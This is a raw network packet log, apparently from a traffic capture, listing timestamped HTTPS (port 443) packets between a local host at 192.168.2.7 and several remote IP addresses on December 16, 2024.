                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.646094084 CET49880443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.655596018 CET49880443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.655605078 CET4434988018.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.663435936 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.663481951 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.663721085 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.663960934 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.663971901 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.696827888 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.696940899 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.696994066 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.698323011 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.698357105 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.743329048 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.743439913 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.791318893 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.821471930 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.821599007 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.821607113 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.821701050 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.863325119 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.099996090 CET4434987320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.100203991 CET4434987320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.100260973 CET49873443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.100447893 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.100600004 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.100640059 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.100753069 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.100779057 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.101002932 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.104839087 CET49873443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.104866028 CET4434987320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.105071068 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.105159998 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.147332907 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.341116905 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.341276884 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.341283083 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.341336012 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.341367006 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.341401100 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.341424942 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.387335062 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.461865902 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.462018013 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.462027073 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.462054014 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.462147951 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.462182045 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.507323980 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.507460117 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.507560968 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.551337004 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.558058023 CET49930443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.558101892 CET4434993020.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.558167934 CET49930443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.558598995 CET49930443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.558610916 CET4434993020.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.583843946 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.584012985 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.584060907 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.631326914 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.631469011 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.679332972 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.706244946 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.706399918 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.747344971 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.747514963 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.795329094 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.826983929 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.827217102 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.827239990 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.827354908 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.827383041 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.827434063 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.827647924 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.827677011 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.871334076 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.947108030 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.947290897 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.947303057 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.947336912 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.947446108 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.947487116 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.951607943 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.951658964 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.951730013 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.952181101 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.952198982 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.952490091 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.952528954 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.952591896 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.952894926 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.952904940 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.954556942 CET49935443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.954597950 CET44349935204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.954745054 CET49935443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.954885960 CET49936443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.954910040 CET44349936204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.954996109 CET49936443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.955038071 CET49935443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.955053091 CET44349935204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.955156088 CET49936443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.955166101 CET44349936204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.977303982 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.977479935 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.977982998 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.977993965 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.979615927 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.979624033 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.991332054 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:19.991461039 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.035336018 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.066567898 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.066704988 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.066704035 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.066878080 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.080930948 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.081269026 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.081300974 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.081862926 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.082179070 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.082283974 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.082415104 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.111331940 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.123333931 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384036064 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384282112 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384397030 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384537935 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384597063 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384799004 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384834051 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.384953976 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.427365065 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.507878065 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.508035898 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.508119106 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.508243084 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.508423090 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.521485090 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.525379896 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.525405884 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.526689053 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.526758909 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.528517962 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.528589010 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.530322075 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.530364990 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.530395031 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.555335999 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.574234962 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.574259043 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.621252060 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.628331900 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.628881931 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.628937006 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.628952026 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.629093885 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.629139900 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.629139900 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.671339035 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.671551943 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.719345093 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.744537115 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.744710922 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.744795084 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.744844913 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.745059013 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.745146036 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.745197058 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.745410919 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.753540993 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.753638983 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.753818989 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.753878117 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.753927946 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.753952980 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.753968954 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.799334049 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.829453945 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.829602957 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.832020998 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.832048893 CET4434991818.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.832073927 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.832192898 CET49918443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.871743917 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.871917009 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.871962070 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.871992111 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.872101068 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.872203112 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.872216940 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.883965015 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.883982897 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.884057999 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.884201050 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.884393930 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.884393930 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.884738922 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.887234926 CET49937443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.887294054 CET44349937116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.887576103 CET49937443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.887628078 CET49937443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.887636900 CET44349937116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:20.919342041 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009390116 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009577990 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009588957 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009619951 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009726048 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009747982 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009880066 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.009886980 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.026700974 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.026835918 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.027015924 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.028053999 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.028079033 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.028106928 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.028604031 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.055334091 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.107927084 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.108114004 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.130672932 CET4434993020.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.131279945 CET49930443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.131299973 CET4434993020.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.132559061 CET4434993020.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.132945061 CET49930443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.133038044 CET4434993020.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.133471012 CET49930443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.133776903 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134008884 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134012938 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134040117 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134042978 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134186983 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134207010 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134207010 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134314060 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134335995 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.134344101 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.175021887 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.175446033 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.175472975 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.176219940 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.176445007 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.176604986 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.178195000 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.178291082 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.178955078 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.178977013 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.179326057 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.179328918 CET4434993020.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.179532051 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.180932999 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.181157112 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.181366920 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.181463957 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.192740917 CET49930443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.219568014 CET49933443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.219603062 CET4434993323.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.223340034 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.234848976 CET49934443192.168.2.723.33.40.153
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.234865904 CET4434993423.33.40.153192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.253777027 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.254108906 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.254142046 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.255745888 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.255783081 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.257211924 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.257296085 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:21.258719921 CET49910443192.168.2.7116.203.12.114
